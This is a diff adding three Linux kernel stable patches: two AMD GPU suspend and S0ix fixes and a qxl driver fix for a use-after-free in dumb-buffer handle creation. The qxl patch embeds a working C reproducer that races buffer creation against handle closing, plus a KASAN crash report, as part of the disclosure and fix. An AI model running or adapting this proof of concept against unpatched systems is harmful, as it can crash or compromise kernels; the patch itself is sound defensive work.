--- /dev/null
+From a7b7d9e8aee4f71b4c7151702fd74237b8cef989 Mon Sep 17 00:00:00 2001
+From: Mario Limonciello <mario.limonciello@amd.com>
+Date: Thu, 18 May 2023 11:52:51 -0500
+Subject: drm/amd: flush any delayed gfxoff on suspend entry
+
+From: Mario Limonciello <mario.limonciello@amd.com>
+
+commit a7b7d9e8aee4f71b4c7151702fd74237b8cef989 upstream.
+
+DCN 3.1.4 is reported to hang on s2idle entry if graphics activity
+is happening during entry. This is because GFXOFF was scheduled as
+delayed but RLC gets disabled in s2idle entry sequence which will
+hang GFX IP if not already in GFXOFF.
+
+To help this problem, flush any delayed work for GFXOFF early in
+s2idle entry sequence to ensure that it's off when RLC is changed.
+
+commit 4b31b92b143f ("drm/amdgpu: complete gfxoff allow signal during
+suspend without delay") modified power gating flow so that if called
+in s0ix that it ensured that GFXOFF wasn't put in work queue but
+instead processed immediately.
+
+This is dead code due to commit 10cb67eb8a1b ("drm/amdgpu: skip
+CG/PG for gfx during S0ix") because GFXOFF will now not be explicitly
+called as part of the suspend entry code. Remove that dead code.
+
+Signed-off-by: Mario Limonciello <mario.limonciello@amd.com>
+Signed-off-by: Tim Huang <tim.huang@amd.com>
+Reviewed-by: Lijo Lazar <lijo.lazar@amd.com>
+Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
+Cc: stable@vger.kernel.org
+Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
+---
+ drivers/gpu/drm/amd/amdgpu/amdgpu_device.c | 1 +
+ drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c | 9 +--------
+ 2 files changed, 2 insertions(+), 8 deletions(-)
+
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4066,6 +4066,7 @@ int amdgpu_device_suspend(struct drm_dev
+ amdgpu_fbdev_set_suspend(adev, 1);
+
+ cancel_delayed_work_sync(&adev->delayed_init_work);
++ flush_delayed_work(&adev->gfx.gfx_off_delay_work);
+
+ amdgpu_ras_suspend(adev);
+
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+@@ -579,15 +579,8 @@ void amdgpu_gfx_off_ctrl(struct amdgpu_d
+
+ if (adev->gfx.gfx_off_req_count == 0 &&
+ !adev->gfx.gfx_off_state) {
+- /* If going to s2idle, no need to wait */
+- if (adev->in_s0ix) {
+- if (!amdgpu_dpm_set_powergating_by_smu(adev,
+- AMD_IP_BLOCK_TYPE_GFX, true))
+- adev->gfx.gfx_off_state = true;
+- } else {
+- schedule_delayed_work(&adev->gfx.gfx_off_delay_work,
++ schedule_delayed_work(&adev->gfx.gfx_off_delay_work,
+ delay);
+- }
+ }
+ } else {
+ if (adev->gfx.gfx_off_req_count == 0) {
--- /dev/null
+From f1740b1ab2703b2a057da7cf33b03297e0381aa0 Mon Sep 17 00:00:00 2001
+From: Tim Huang <Tim.Huang@amd.com>
+Date: Mon, 14 Aug 2023 15:13:04 +0800
+Subject: drm/amdgpu: skip fence GFX interrupts disable/enable for S0ix
+
+From: Tim Huang <Tim.Huang@amd.com>
+
+commit f1740b1ab2703b2a057da7cf33b03297e0381aa0 upstream.
+
+GFX v11.0.1 reported fence fallback timer expired issue on
+SDMA and GFX rings after S0ix resume. This is generated by
+EOP interrupts are disabled when S0ix suspend but fails to
+re-enable when resume because of the GFX is in GFXOFF.
+
+[ 203.349571] [drm] Fence fallback timer expired on ring sdma0
+[ 203.349572] [drm] Fence fallback timer expired on ring gfx_0.0.0
+[ 203.861635] [drm] Fence fallback timer expired on ring gfx_0.0.0
+
+For S0ix, GFX is in GFXOFF state, avoid to touch the GFX registers
+to configure the fence driver interrupts for rings that belong to GFX.
+The interrupts configuration will be restored by GFXOFF exit.
+
+Signed-off-by: Tim Huang <Tim.Huang@amd.com>
+Reviewed-by: Mario Limonciello <mario.limonciello@amd.com>
+Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
+Cc: stable@vger.kernel.org
+Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
+---
+ drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c | 41 ++++++++++++++++++++++++++++--
+ 1 file changed, 39 insertions(+), 2 deletions(-)
+
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+@@ -535,6 +535,41 @@ int amdgpu_fence_driver_sw_init(struct a
+ }
+
+ /**
++ * amdgpu_fence_need_ring_interrupt_restore - helper function to check whether
++ * fence driver interrupts need to be restored.
++ *
++ * @ring: ring that to be checked
++ *
++ * Interrupts for rings that belong to GFX IP don't need to be restored
++ * when the target power state is s0ix.
++ *
++ * Return true if need to restore interrupts, false otherwise.
++ */
++static bool amdgpu_fence_need_ring_interrupt_restore(struct amdgpu_ring *ring)
++{
++ struct amdgpu_device *adev = ring->adev;
++ bool is_gfx_power_domain = false;
++
++ switch (ring->funcs->type) {
++ case AMDGPU_RING_TYPE_SDMA:
++ /* SDMA 5.x+ is part of GFX power domain so it's covered by GFXOFF */
++ if (adev->ip_versions[SDMA0_HWIP][0] >= IP_VERSION(5, 0, 0))
++ is_gfx_power_domain = true;
++ break;
++ case AMDGPU_RING_TYPE_GFX:
++ case AMDGPU_RING_TYPE_COMPUTE:
++ case AMDGPU_RING_TYPE_KIQ:
++ case AMDGPU_RING_TYPE_MES:
++ is_gfx_power_domain = true;
++ break;
++ default:
++ break;
++ }
++
++ return !(adev->in_s0ix && is_gfx_power_domain);
++}
++
++/**
+ * amdgpu_fence_driver_hw_fini - tear down the fence driver
+ * for all possible rings.
+ *
+@@ -562,7 +597,8 @@ void amdgpu_fence_driver_hw_fini(struct
+ amdgpu_fence_driver_force_completion(ring);
+
+ if (!drm_dev_is_unplugged(adev_to_drm(adev)) &&
+- ring->fence_drv.irq_src)
++ ring->fence_drv.irq_src &&
++ amdgpu_fence_need_ring_interrupt_restore(ring))
+ amdgpu_irq_put(adev, ring->fence_drv.irq_src,
+ ring->fence_drv.irq_type);
+
+@@ -619,7 +655,8 @@ void amdgpu_fence_driver_hw_init(struct
+ continue;
+
+ /* enable the interrupt */
+- if (ring->fence_drv.irq_src)
++ if (ring->fence_drv.irq_src &&
++ amdgpu_fence_need_ring_interrupt_restore(ring))
+ amdgpu_irq_get(adev, ring->fence_drv.irq_src,
+ ring->fence_drv.irq_type);
+ }
--- /dev/null
+From c611589b4259ed63b9b77be6872b1ce07ec0ac16 Mon Sep 17 00:00:00 2001
+From: Wander Lairson Costa <wander@redhat.com>
+Date: Mon, 14 Aug 2023 13:51:19 -0300
+Subject: drm/qxl: fix UAF on handle creation
+
+From: Wander Lairson Costa <wander@redhat.com>
+
+commit c611589b4259ed63b9b77be6872b1ce07ec0ac16 upstream.
+
+qxl_mode_dumb_create() dereferences the qobj returned by
+qxl_gem_object_create_with_handle(), but the handle is the only one
+holding a reference to it.
+
+A potential attacker could guess the returned handle value and closes it
+between the return of qxl_gem_object_create_with_handle() and the qobj
+usage, triggering a use-after-free scenario.
+
+Reproducer:
+
+int dri_fd =-1;
+struct drm_mode_create_dumb arg = {0};
+
+void gem_close(int handle);
+
+void* trigger(void* ptr)
+{
+ int ret;
+ arg.width = arg.height = 0x20;
+ arg.bpp = 32;
+ ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &arg);
+ if(ret)
+ {
+ perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
+ exit(-1);
+ }
+ gem_close(arg.handle);
+ while(1) {
+ struct drm_mode_create_dumb args = {0};
+ args.width = args.height = 0x20;
+ args.bpp = 32;
+ ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &args);
+ if (ret) {
+ perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
+ exit(-1);
+ }
+
+ printf("[*] DRM_IOCTL_MODE_CREATE_DUMB created, %d\n", args.handle);
+ gem_close(args.handle);
+ }
+ return NULL;
+}
+
+void gem_close(int handle)
+{
+ struct drm_gem_close args;
+ args.handle = handle;
+ int ret = ioctl(dri_fd, DRM_IOCTL_GEM_CLOSE, &args); // gem close handle
+ if (!ret)
+ printf("gem close handle %d\n", args.handle);
+}
+
+int main(void)
+{
+ dri_fd= open("/dev/dri/card0", O_RDWR);
+ printf("fd:%d\n", dri_fd);
+
+ if(dri_fd == -1)
+ return -1;
+
+ pthread_t tid1;
+
+ if(pthread_create(&tid1,NULL,trigger,NULL)){
+ perror("[*] thread_create tid1\n");
+ return -1;
+ }
+ while (1)
+ {
+ gem_close(arg.handle);
+ }
+ return 0;
+}
+
+This is a KASAN report:
+
+==================================================================
+BUG: KASAN: slab-use-after-free in qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
+Write of size 1 at addr ffff88801136c240 by task poc/515
+
+CPU: 1 PID: 515 Comm: poc Not tainted 6.3.0 #3
+Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014
+Call Trace:
+<TASK>
+__dump_stack linux/lib/dump_stack.c:88
+dump_stack_lvl+0x48/0x70 linux/lib/dump_stack.c:106
+print_address_description linux/mm/kasan/report.c:319
+print_report+0xd2/0x660 linux/mm/kasan/report.c:430
+kasan_report+0xd2/0x110 linux/mm/kasan/report.c:536
+__asan_report_store1_noabort+0x17/0x30 linux/mm/kasan/report_generic.c:383
+qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
+drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
+drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
+drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
+drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
+vfs_ioctl linux/fs/ioctl.c:51
+__do_sys_ioctl linux/fs/ioctl.c:870
+__se_sys_ioctl linux/fs/ioctl.c:856
+__x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
+do_syscall_x64 linux/arch/x86/entry/common.c:50
+do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
+entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
+RIP: 0033:0x7ff5004ff5f7
+Code: 00 00 00 48 8b 05 99 c8 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 69 c8 0d 00 f7 d8 64 89 01 48
+
+RSP: 002b:00007ff500408ea8 EFLAGS: 00000286 ORIG_RAX: 0000000000000010
+RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff5004ff5f7
+RDX: 00007ff500408ec0 RSI: 00000000c02064b2 RDI: 0000000000000003
+RBP: 00007ff500408ef0 R08: 0000000000000000 R09: 000000000000002a
+R10: 0000000000000000 R11: 0000000000000286 R12: 00007fff1c6cdafe
+R13: 00007fff1c6cdaff R14: 00007ff500408fc0 R15: 0000000000802000
+</TASK>
+
+Allocated by task 515:
+kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
+kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
+kasan_save_alloc_info+0x1e/0x40 linux/mm/kasan/generic.c:510
+____kasan_kmalloc linux/mm/kasan/common.c:374
+__kasan_kmalloc+0xc3/0xd0 linux/mm/kasan/common.c:383
+kasan_kmalloc linux/./include/linux/kasan.h:196
+kmalloc_trace+0x48/0xc0 linux/mm/slab_common.c:1066
+kmalloc linux/./include/linux/slab.h:580
+kzalloc linux/./include/linux/slab.h:720
+qxl_bo_create+0x11a/0x610 linux/drivers/gpu/drm/qxl/qxl_object.c:124
+qxl_gem_object_create+0xd9/0x360 linux/drivers/gpu/drm/qxl/qxl_gem.c:58
+qxl_gem_object_create_with_handle+0xa1/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:89
+qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
+drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
+drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
+drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
+drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
+vfs_ioctl linux/fs/ioctl.c:51
+__do_sys_ioctl linux/fs/ioctl.c:870
+__se_sys_ioctl linux/fs/ioctl.c:856
+__x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
+do_syscall_x64 linux/arch/x86/entry/common.c:50
+do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
+entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
+
+Freed by task 515:
+kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
+kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
+kasan_save_free_info+0x2e/0x60 linux/mm/kasan/generic.c:521
+____kasan_slab_free linux/mm/kasan/common.c:236
+____kasan_slab_free+0x180/0x1f0 linux/mm/kasan/common.c:200
+__kasan_slab_free+0x12/0x30 linux/mm/kasan/common.c:244
+kasan_slab_free linux/./include/linux/kasan.h:162
+slab_free_hook linux/mm/slub.c:1781
+slab_free_freelist_hook+0xd2/0x1a0 linux/mm/slub.c:1807
+slab_free linux/mm/slub.c:3787
+__kmem_cache_free+0x196/0x2d0 linux/mm/slub.c:3800
+kfree+0x78/0x120 linux/mm/slab_common.c:1019
+qxl_ttm_bo_destroy+0x140/0x1a0 linux/drivers/gpu/drm/qxl/qxl_object.c:49
+ttm_bo_release+0x678/0xa30 linux/drivers/gpu/drm/ttm/ttm_bo.c:381
+kref_put linux/./include/linux/kref.h:65
+ttm_bo_put+0x50/0x80 linux/drivers/gpu/drm/ttm/ttm_bo.c:393
+qxl_gem_object_free+0x3e/0x60 linux/drivers/gpu/drm/qxl/qxl_gem.c:42
+drm_gem_object_free+0x5c/0x90 linux/drivers/gpu/drm/drm_gem.c:974
+kref_put linux/./include/linux/kref.h:65
+__drm_gem_object_put linux/./include/drm/drm_gem.h:431
+drm_gem_object_put linux/./include/drm/drm_gem.h:444
+qxl_gem_object_create_with_handle+0x151/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:100
+qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
+drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
+drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
+drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
+drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
+vfs_ioctl linux/fs/ioctl.c:51
+__do_sys_ioctl linux/fs/ioctl.c:870
+__se_sys_ioctl linux/fs/ioctl.c:856
+__x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
+do_syscall_x64 linux/arch/x86/entry/common.c:50
+do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
+entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
+
+The buggy address belongs to the object at ffff88801136c000
+which belongs to the cache kmalloc-1k of size 1024
+The buggy address is located 576 bytes inside of
+freed 1024-byte region [ffff88801136c000, ffff88801136c400)
+
+The buggy address belongs to the physical page:
+page:0000000089fc329b refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11368
+head:0000000089fc329b order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0
+flags: 0xfffffc0010200(slab|head|node=0|zone=1|lastcpupid=0x1fffff)
+raw: 000fffffc0010200 ffff888007841dc0 dead000000000122 0000000000000000
+raw: 0000000000000000 0000000080100010 00000001ffffffff 0000000000000000
+page dumped because: kasan: bad access detected
+
+Memory state around the buggy address:
+ffff88801136c100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
+ffff88801136c180: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
+>ffff88801136c200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
+^
+ffff88801136c280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
+ffff88801136c300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
+==================================================================
+Disabling lock debugging due to kernel taint
+
+Instead of returning a weak reference to the qxl_bo object, return the
+created drm_gem_object and let the caller decrement the reference count
+when it no longer needs it. As a convenience, if the caller is not
+interested in the gobj object, it can pass NULL to the parameter and the
+reference counting is descremented internally.
+
+The bug and the reproducer were originally found by the Zero Day Initiative project (ZDI-CAN-20940).
+
+Link: https://www.zerodayinitiative.com/
+Signed-off-by: Wander Lairson Costa <wander@redhat.com>
+Cc: stable@vger.kernel.org
+Reviewed-by: Dave Airlie <airlied@redhat.com>
+Signed-off-by: Dave Airlie <airlied@redhat.com>
+Link: https://patchwork.freedesktop.org/patch/msgid/20230814165119.90847-1-wander@redhat.com
+Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
+---
+ drivers/gpu/drm/qxl/qxl_drv.h | 2 +-
+ drivers/gpu/drm/qxl/qxl_dumb.c | 5 ++++-
+ drivers/gpu/drm/qxl/qxl_gem.c | 25 +++++++++++++++++--------
+ drivers/gpu/drm/qxl/qxl_ioctl.c | 6 ++----
+ 4 files changed, 24 insertions(+), 14 deletions(-)
+
+--- a/drivers/gpu/drm/qxl/qxl_drv.h
++++ b/drivers/gpu/drm/qxl/qxl_drv.h
+@@ -318,7 +318,7 @@ int qxl_gem_object_create_with_handle(st
+ u32 domain,
+ size_t size,
+ struct qxl_surface *surf,
+- struct qxl_bo **qobj,
++ struct drm_gem_object **gobj,
+ uint32_t *handle);
+ void qxl_gem_object_free(struct drm_gem_object *gobj);
+ int qxl_gem_object_open(struct drm_gem_object *obj, struct drm_file *file_priv);
+--- a/drivers/gpu/drm/qxl/qxl_dumb.c
++++ b/drivers/gpu/drm/qxl/qxl_dumb.c
+@@ -34,6 +34,7 @@ int qxl_mode_dumb_create(struct drm_file
+ {
+ struct qxl_device *qdev = to_qxl(dev);
+ struct qxl_bo *qobj;
++ struct drm_gem_object *gobj;
+ uint32_t handle;
+ int r;
+ struct qxl_surface surf;
+@@ -62,11 +63,13 @@ int qxl_mode_dumb_create(struct drm_file
+
+ r = qxl_gem_object_create_with_handle(qdev, file_priv,
+ QXL_GEM_DOMAIN_CPU,
+- args->size, &surf, &qobj,
++ args->size, &surf, &gobj,
+ &handle);
+ if (r)
+ return r;
++ qobj = gem_to_qxl_bo(gobj);
+ qobj->is_dumb = true;
++ drm_gem_object_put(gobj);
+ args->pitch = pitch;
+ args->handle = handle;
+ return 0;
+--- a/drivers/gpu/drm/qxl/qxl_gem.c
++++ b/drivers/gpu/drm/qxl/qxl_gem.c
+@@ -72,32 +72,41 @@ int qxl_gem_object_create(struct qxl_dev
+ return 0;
+ }
+
++/*
++ * If the caller passed a valid gobj pointer, it is responsible to call
++ * drm_gem_object_put() when it no longer needs to acess the object.
++ *
++ * If gobj is NULL, it is handled internally.
++ */
+ int qxl_gem_object_create_with_handle(struct qxl_device *qdev,
+ struct drm_file *file_priv,
+ u32 domain,
+ size_t size,
+ struct qxl_surface *surf,
+- struct qxl_bo **qobj,
++ struct drm_gem_object **gobj,
+ uint32_t *handle)
+ {
+- struct drm_gem_object *gobj;
+ int r;
++ struct drm_gem_object *local_gobj;
+
+- BUG_ON(!qobj);
+ BUG_ON(!handle);
+
+ r = qxl_gem_object_create(qdev, size, 0,
+ domain,
+ false, false, surf,
+- &gobj);
++ &local_gobj);
+ if (r)
+ return -ENOMEM;
+- r = drm_gem_handle_create(file_priv, gobj, handle);
++ r = drm_gem_handle_create(file_priv, local_gobj, handle);
+ if (r)
+ return r;
+- /* drop reference from allocate - handle holds it now */
+- *qobj = gem_to_qxl_bo(gobj);
+- drm_gem_object_put(gobj);
++
++ if (gobj)
++ *gobj = local_gobj;
++ else
++ /* drop reference from allocate - handle holds it now */
++ drm_gem_object_put(local_gobj);
++
+ return 0;
+ }
+
+--- a/drivers/gpu/drm/qxl/qxl_ioctl.c
++++ b/drivers/gpu/drm/qxl/qxl_ioctl.c
+@@ -39,7 +39,6 @@ static int qxl_alloc_ioctl(struct drm_de
+ struct qxl_device *qdev = to_qxl(dev);
+ struct drm_qxl_alloc *qxl_alloc = data;
+ int ret;
+- struct qxl_bo *qobj;
+ uint32_t handle;
+ u32 domain = QXL_GEM_DOMAIN_VRAM;
+
+@@ -51,7 +50,7 @@ static int qxl_alloc_ioctl(struct drm_de
+ domain,
+ qxl_alloc->size,
+ NULL,
+- &qobj, &handle);
++ NULL, &handle);
+ if (ret) {
+ DRM_ERROR("%s: failed to create gem ret=%d\n",
+ __func__, ret);
+@@ -393,7 +392,6 @@ static int qxl_alloc_surf_ioctl(struct d
+ {
+ struct qxl_device *qdev = to_qxl(dev);
+ struct drm_qxl_alloc_surf *param = data;
+- struct qxl_bo *qobj;
+ int handle;
+ int ret;
+ int size, actual_stride;
+@@ -413,7 +411,7 @@ static int qxl_alloc_surf_ioctl(struct d
+ QXL_GEM_DOMAIN_SURFACE,
+ size,
+ &surf,
+- &qobj, &handle);
++ NULL, &handle);
+ if (ret) {
+ DRM_ERROR("%s: failed to create gem ret=%d\n",
+ __func__, ret);